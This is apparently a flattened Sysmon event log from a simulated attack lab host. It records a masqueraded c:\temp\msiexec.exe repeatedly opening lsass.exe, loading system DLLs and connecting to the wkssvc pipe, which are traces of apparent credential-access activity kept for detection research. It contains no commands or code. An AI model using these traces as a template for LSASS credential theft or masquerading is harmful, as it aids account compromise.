15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700761Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700760Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700759Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700758Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700757Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700756Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700755Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700754Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700753Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700752Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700751Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700750Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002700748Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400\wkssvcc:\temp\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700747Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700746Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700745Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700744Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700743Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700742Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-1500-000000006202}10482524C:\Windows\system32\svchost.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700741Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700740Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700739Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700738Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700737Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700736Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700735Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700734Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700733Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700732Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700731Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700730Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700729Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700728Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700727Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700726Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700725Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 